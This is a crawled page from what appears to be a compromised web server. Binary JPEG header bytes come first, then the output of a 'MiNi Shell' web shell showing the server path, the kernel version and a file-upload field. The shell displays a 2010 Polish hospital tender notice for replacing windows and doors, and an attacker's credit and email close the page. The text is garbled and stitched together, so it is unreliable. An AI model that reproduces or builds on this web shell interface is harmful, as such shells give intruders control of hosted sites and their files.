JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100923/304404-N-2010.html

<p class="kh_header"><b>Lubliniec: Wymiana stolarki okiennej i drzwiowej w pawilonie chorych D i budynku administracji</b><br>
<b>Numer ogłoszenia: 304404 - 2010; data zamieszczenia: 23.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Neuropsychiatryczny im. dr Emila Cyrana w Lublińcu , ul. Grunwaldzka 48, 42-700 Lubliniec, woj. śląskie, tel. 034 3562451 do 57, faks 034 3562880.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsnlc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej i drzwiowej w pawilonie chorych D i budynku administracji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana stolarki okiennej i drzwiowej w pawilonie chorych D i budynku administracji. Zadanie podzielone jest na dwie części:
część I -  Wymiana stolarki okiennej i drzwiowej w pawilonie chorych D;
część II -  Wymiana stolarki okiennej i drzwiowej w budynku administracji.
Całość robót należy wykonać zgodnie z Warunkami technicznymi wykonania i odbioru robót, przedmiarem robót oraz zestawieniem stolarki (odpowiednie załączniki do SIWZ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca winien wnieść wadium w wysokości dla:
Części I - WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ W PAWILONIE CHORYCH D 8 400,00 zł (słownie złotych: osiem tysięcy czterysta);
Części II - WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ W BUDYNKU ADMINISTRACJI
2 600,00 zł (słownie złotych: dwa tysiące sześćset)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">deklaracje zgodności na montowane okna i drzwi oraz szyby bezpieczne</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień umowy może nastąpić w następujących przypadkach:
a)zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru Wykonawcy;
b)zmian korzystnych dla Zamawiającego, których konieczność wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, tj.: obniżenie kosztu wykonania robót, poprawa wartości, podniesienie bezpieczeństwa itp.,
c)w trakcie wykonywania przedmiotu umowy nastąpiła zmiana przepisów prawa budowlanego lub innych mających wpływ na opisany przedmiot zamówienia;
d)przesunięcia terminu wykonania przedmiotu umowy, jeżeli z przyczyn od Wykonawcy niezależnych, których nie można było przewidzieć w chwili zawarcia umowy, nie jest możliwe dotrzymanie terminu wykonania umowy.
2.Konieczność wprowadzenia zmian w umowie musi być poprzedzona sporządzeniem protokołu konieczności i zaakceptowana przez inspektora nadzoru oraz kierownika Zamawiającego.
3.Wprowadzenie robót zamiennych (zmiany nie wykraczające poza pierwotny opis przedmiotu zamówienia) może nastąpić poprzez wprowadzenie zmian do umowy w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wsnlc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Neuropsychiatryczny im. dr Emila Cyrana w Lublińcu
ul. Grunwaldzka 48 
42-700 LUBLINIEC
tel. (0-34) 356-24-51 do 56 wew. 119
zp_wsnlc.@gazeta.pl
kontakt: Danuta Łukasik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2010 godzina 10:30, miejsce: Wojewódzki Szpital Neuropsychiatryczny im. dr Emila Cyrana w Lublińcu
ul. Grunwaldzka 48 
42-700 LUBLINIEC
sekretariat, pok. 13-14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ W PAWILONIE CHORYCH D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I - WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ W PAWILONIE CHORYCH D
Całość robót należy wykonać zgodnie z Warunkami technicznymi wykonania i odbioru robót (Załącznik nr 5), przedmiarem robót (Załącznik nr 6) oraz zestawieniem stolarki (Załącznik nr 7).
Zakres prac objętych Specyfikacją Techniczną:
1.Roboty rozbiórkowe
 1.1. Wykucie z muru podokienników zewnętrznych
 1.2. Wykucie z muru podokienników wewnętrznych
 1.3. Wykucie z muru ościeżnic drewnianych okiennych
 1.4. Wykucie z muru krat okiennych 
 1.5. Rozebranie ścian z cegieł na zaprawie cementowo-wapiennej - skucie ścian w otworach okiennych w miejscu podokienników 
 1.6. Rozbiórka elementów konstrukcji betonowych niezbrojonych - schody zewnętrzne
 1.7. Wywiezienie gruzu spryzmowanego samochodami skrzyniowymi na odległość do 1 km wraz z opłatą za składowanie na wysypisku
 1.8. Wywiezienie gruzu spryzmowanego samochodami skrzyniowymi - za każdy następny 1 km 
2.Montaż stolarki okiennej  (pozycje 1 do 18)
2.1. Okna o powierzchni ponad 1.5 m2 z PCW - okna 4-kwaterowe, UR-R;
2.2. Okna o powierzchni ponad 1.5 m2 z PCW - okna 2-kwaterowe UR-R + FIX;
2.3. Okna o powierzchni do 1.5 m2 z PCW - okna 2-kwaterowe, UR-R;
2.4. Okna o powierzchni do 1.0 m2 z PCW;
2.5. Okna o powierzchni do 1.0 m2 z PCW - okna okrągłe, poz. 3;
2.6. Okna o powierzchni ponad 1.5 m2 z PCW, okno z wyokrągleniami rogów, poz. 13;
2.7. Drzwi balkonowe z PCW - drzwi balkonowe z PCV z naświetlem, poz. 8;
2.8. Nawietrzniki do okien;
2.9. Obsadzenie podokienników zewnętrznych szer. 17 cm z blachy Al., malowanych proszkowo w kolorze brązowym;
2.10.Obsadzenie podokienników wewnętrznych szer. 35 cm z PCV, komorowych w kolorze białym;
2.11.Zamurowanie bruzd pionowych o przekroju 1/4x1/4 ceg. w ścianach z cegieł, uzupełnienia na zaprawie cem-wapiennej m.4, uzupełnienie ścian po wykuciu okien skrzynkowych;
2.12.Wykonanie pasów tynku zwykłego kat. III o szerokości do 30 cm na murach z cegieł lub ścianach z betonu pokrywającego bruzdy uprzednio zamurowanych cegłami, tynki wewnętrzne;
2.13.Wykonanie tynków zwykłych zewnętrznych kat. III z zaprawy cementowo-wapiennej na ościeżach szerokości do 15 cm;
2.14.Dwukrotne malowanie farbami olejnymi starych tynków wewnętrznych ścian z dwukrotnym szpachlowaniem po wymianie stolarki okiennej.
Stolarka okienna szklona szkłem podwójnym, o przenikalności cieplnej nie mniejszej niż 1,1 W/(m2*K), kolor stolarki biały, szprosy wykonać wg rysunku jako międzyszybowe. Otwieranie okien klamką zamykaną na klucz, wymaga się jednego rodzaju klucza do wszystkich okien. Szklenie okien szkłem bezpiecznym. Każde okno ma być wyposażone w nawietrzak okienny. W trzech sztukach okien, dla poz. 1 zamontować wentylatory wyciągowe, okna zamontować w palarniach.
3.Stolarka drzwiowa   (pozycje 21-25 stolarka zewnętrzna, 31-32 - wewnętrzna)
3.1.Montaż drzwi aluminiowych oszklonych zewnętrznych;
3.2. Montaż drzwi aluminiowych wewnętrznych;
3.3.Wykonanie tynków zwykłych wewnętrznych kat. III z zaprawy cementowo-wapiennej na ościeżach szerokości do 15 cm;
3.4.Montaż samozamykaczy do skrzydeł drzwiowych.
Drzwi zewnętrzne i wewnętrzne aluminiowe, odtworzenie wg istniejących rysunków drzwi.  Wymaga się jednego rodzaju klucza do wszystkich drzwi.
4.Roboty dodatkowe
4.1Wymiana elementów konstrukcyjnych dachu - murłaty i podwaliny - oczep drewniany podokienny w wieżyczce;
4.2 Wymiana elementów konstrukcyjnych dachu - słupy - filarki przyokienne w wieżyczce;
4.3 Schody żelbetowe - stopnie betonowe zewnętrzne i wewnętrzne na gotowym podłożu - ręczne układanie betonu;
4.4 Montaż wycieraczki do obuwia; 
4.5 Okładziny schodów z płytek kamionkowych GRES, mrozoodpornych o wym. 20x20 cm na zaprawie klejowej mrozoodpornej o grubości warstwy 4 mm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II - WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ W BUDYNKU ADMINISTRACJI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II - WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ W BUDYNKU ADMINISTRACJI
Całość robót należy wykonać zgodnie z Warunkami technicznymi wykonania i odbioru robót (Załącznik nr 8), przedmiarem robót (Załącznik nr 9) oraz zestawieniem stolarki (Załączniki nr 10a-d).
Zakres prac objętych Specyfikacją Techniczną:
1.Roboty rozbiórkowe
1.1Wykucie z muru podokienników wewnętrznych;
1.2Wykucie z muru ościeżnic drewnianych okiennych;
1.3Wykucie z muru krat okiennych;
1.4Rozebranie ścian z cegieł na zaprawie cementowo-wapiennej - skucie ścian w otworach okiennych w miejscu podokienników ;
1.5Wywiezienie gruzu spryzmowanego samochodami skrzyniowymi na odległość do 1 km wraz z opłatą za składowanie na wysypisku;
1.6Wywiezienie gruzu spryzmowanego samochodami skrzyniowymi - za każdy następny 1 km .
2.Montaż stolarki okiennej  (zestawienie stolarki: pozycje 1 do 31)
2.1Okna o powierzchni ponad 1.5 m2 z PCW - okna 4-kwaterowe (pozycje 1, 5, 22);
2.2Okna o powierzchni ponad 1.5 m2 z PCW - okna 2-kwaterowe (pozycje 2, 3, 4, 23);
2.3Okna o powierzchni ponad 1.5 m2 z PCW - okna 1-kwaterowe (pozycje 6, 7, 8, 9, 10);
2.4Okna o powierzchni ponad 1.5 m2 z PCW - okna 2-kwaterowe ze szprosami (p.12);
2.5Okna o powierzchni do 1.5 m2 z PCW - okna 1-kwaterowe ze szprosami (pozycje 14, 15, 18, 19, 20, 21, 25, 26, 29);
2.6Okna o powierzchni do 1.0 m2 z PCW - pozycje 11, 13, 17, 24, 27, 28, 30, 31;
2.7Nawietrzniki do okien;
2.8Obsadzenie podokienników wewnętrznych szer. 40 cm z PCV, komorowych w kolorze białym; 
2.9Zamurowanie bruzd pionowych o przekroju 1/4x1/4 ceg. w ścianach z cegieł, uzupełnienia na zaprawie cem-wapiennej m.4, uzupełnienie ścian po wykuciu okien skrzynkowych;
2.10Wykonanie pasów tynku zwykłego kat. III o szerokości do 30 cm na murach z cegieł lub ścianach z betonu pokrywającego bruzdy uprzednio zamurowanych cegłami, tynki wewnętrzne;
2.11Wykonanie tynków zwykłych zewnętrznych kat. III z zaprawy cementowo-wapiennej na ościeżach szerokości do 15 cm;
2.12Dwukrotne malowanie farbami olejnymi starych tynków wewnętrznych ścian z dwukrotnym szpachlowaniem po wymianie stolarki okiennej.
Stolarka okienna szklona szkłem podwójnym, o przenikalności cieplnej nie mniejszej niż 1,1 W/(m2*K), kolor stolarki biały, szprosy wykonać wg rysunku jako międzyszybowe. Otwieranie okien klamką. Szklenie okien szkłem zwykłym, natomiast w pomieszczeniu kasy bezpiecznym (pozycja nr 2). Każde okno ma być wyposażone w nawietrzak okienny. 
3.Stolarka drzwiowa
3.1Ościeżnice stalowe;
3.2Skrzydła drzwiowe zewnętrzne pełne, fabrycznie wykończone o powierzchni ponad 1.0 m2;
3.3Skrzydła drzwiowe wewnętrzne pełne, fabrycznie wykończone o powierzchni ponad 1.0 m2;
3.4 Wykonanie tynków zwykłych wewnętrznych kat. III z zaprawy cementowo-wapiennej na ościeżach szerokości do 15 cm;
3.5Montaż samozamykaczy do skrzydeł drzwiowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com